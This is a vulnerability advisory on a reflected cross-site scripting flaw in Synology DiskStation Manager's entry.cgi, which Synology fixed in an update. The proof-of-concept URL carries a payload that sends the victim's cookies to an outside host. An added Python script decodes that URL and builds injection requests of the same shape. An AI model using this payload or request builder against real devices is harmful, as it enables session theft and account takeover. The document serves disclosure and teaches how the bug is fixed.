Reflected Cross-Site Scripting in Synology DiskStation Manager

Abstract

A reflected Cross-Site Scripting vulnerability was found in Synology DiskStation Manager. This issue allows attackers to perform a wide variety of actions, such as stealing victims' session tokens or login credentials (if available), performing arbitrary actions on their behalf, or redirecting them to potentially malicious websites.

Tested version

This issue was tested on Synology DiskStation Manager version 5.2-5565.

Fix

Synology reports that this issue has been resolved in DiskStation Manager version 5.2-5565 Update 1 (2015/05/21). https://www.synology.com/en-global/releaseNote/DS214play

Introduction

DiskStation Manager (DSM) is the web-based operating system found on every Synology NAS. It can be used to manage data, including documents, photos, music, and videos. A reflected Cross-Site Scripting vulnerability was found in Synology DiskStation Manager.

Details

The reflected Cross-Site Scripting vulnerability exists in entry.cgi because the response is served with an incorrect content type: the Content-Type header declares the body to be HTML, while the body is in fact JSON. Because the browser renders the body as an HTML document, any value from the compound parameter (a JSON array of batched API calls) that is echoed back into the response without validation or output encoding is interpreted as markup, which results in reflected Cross-Site Scripting.

Tricking a victim into visiting a specially crafted URL allows an attacker to run arbitrary client-side script in the victim's browser, within the origin of the DSM web interface. The attacker-supplied code can perform a wide variety of actions, such as stealing the victim's session tokens or login credentials (if available), performing arbitrary actions on their behalf, or redirecting them to potentially malicious websites.

The following proof of concept demonstrates this issue: http://:5000/webapi/entry.cgi?compound=%5B{%22api%22%3a%22%3Cimg+src%3dx+onerror%3dthis.src%3d%27https%3a//www.securify.nl/%3fc%3d%27%2bdocument.cookie%3E%22%2c%22method%22%3a%22status%22%2c%22version%22%3a1}%2c{%22api%22%3a%22SYNO.Core.System.Utilization%22%2c%22method%22%3a%22get%22%2c%22version%22%3a1%2c%22type%22%3a%22current%22%2c%22resource%22%3a%5B%22cpu%22%2c%22memory%22%2c%22network%22%5D}%5D&api=SYNO.Entry.Request&method=request&version=1
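To make the mechanism concrete, the following Python script is an added example and is not Securify's or Synology's code. It decodes the compound parameter of the proof-of-concept URL above to show what entry.cgi actually parses, builds a request of the same shape with an arbitrary payload, and applies the check that matters for this bug: whether the body is served as text/html and reflects the supplied api value without encoding. The hostname, the canary payload and the layout of the JSON error body are assumptions, not values taken from DSM.

```python
import html
import json
from urllib.parse import parse_qs, urlencode, urlsplit

# The advisory's proof-of-concept URL, verbatim (the host is elided in the advisory).
POC_URL = (
    "http://:5000/webapi/entry.cgi?compound=%5B{%22api%22%3a%22%3Cimg+src%3dx+onerror%3dthis.src%3d%27"
    "https%3a//www.securify.nl/%3fc%3d%27%2bdocument.cookie%3E%22%2c%22method%22%3a%22status%22%2c%22version%22%3a1}"
    "%2c{%22api%22%3a%22SYNO.Core.System.Utilization%22%2c%22method%22%3a%22get%22%2c%22version%22%3a1%2c"
    "%22type%22%3a%22current%22%2c%22resource%22%3a%5B%22cpu%22%2c%22memory%22%2c%22network%22%5D}%5D"
    "&api=SYNO.Entry.Request&method=request&version=1"
)

# Assumed canary payload for the examples below (not the advisory's payload).
CANARY = "<img src=x onerror=alert(document.domain)>"


def decode_compound(url):
    """Return the list of API calls carried in the compound parameter.

    SYNO.Entry.Request batches several API calls into one JSON array; removing
    the URL encoding shows the structure that entry.cgi parses and echoes back.
    """
    params = parse_qs(urlsplit(url).query)
    return json.loads(params["compound"][0])


def build_compound_request(host, injected_api):
    """Build a URL of the same shape as the PoC, with an arbitrary value in the
    first call's api field (the field that is reflected into the response)."""
    compound = [
        {"api": injected_api, "method": "status", "version": 1},
        {"api": "SYNO.Core.System.Utilization", "method": "get", "version": 1,
         "type": "current", "resource": ["cpu", "memory", "network"]},
    ]
    query = urlencode({
        "compound": json.dumps(compound, separators=(",", ":")),
        "api": "SYNO.Entry.Request",
        "method": "request",
        "version": 1,
    })
    return f"http://{host}:5000/webapi/entry.cgi?{query}"


def rendered_as_html(content_type):
    """A browser parses the body as a document only when it is labelled
    text/html; a JSON body labelled application/json is never treated as markup."""
    mime = content_type.split(";", 1)[0].strip().lower()
    return mime == "text/html"


def is_reflected_xss(content_type, body, injected_api):
    """The two conditions of this bug: the body is rendered as HTML and the
    attacker's string appears in it byte-for-byte (no HTML encoding applied)."""
    return rendered_as_html(content_type) and injected_api in body


def sample_body(injected_api):
    """Constructed JSON error body that echoes the unknown api name back.
    The exact layout of a DSM error response is an assumption; only the
    verbatim echo and the Content-Type header matter for the check."""
    return json.dumps({
        "data": {"has_fail": True,
                 "result": [{"api": injected_api, "error": {"code": 100}, "success": False}]},
        "success": True,
    })


# Constructed (Content-Type, body) pairs, not captured from a device.
VULNERABLE = ("text/html; charset=utf-8", sample_body(CANARY))
FIXED_TYPE = ("application/json; charset=utf-8", sample_body(CANARY))      # correct MIME type
FIXED_ESCAPED = ("text/html; charset=utf-8", html.escape(sample_body(CANARY)))  # output encoding

if __name__ == "__main__":
    print(json.dumps(decode_compound(POC_URL), indent=2))
    print(build_compound_request("nas.example.internal", CANARY))  # assumed host
    for name, (ctype, body) in [("vulnerable", VULNERABLE), ("fixed type", FIXED_TYPE),
                                ("escaped", FIXED_ESCAPED)]:
        print(f"{name}: reflected XSS = {is_reflected_xss(ctype, body, CANARY)}")
```

Against a live device the same check would be run on the real response headers and body. The two FIXED_ variants show the two independent ways to close this class of bug: serve the JSON with its correct Content-Type, or HTML-encode anything echoed into a response that is labelled HTML; the advisory does not state which change Synology's update made.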

Questions or feedback?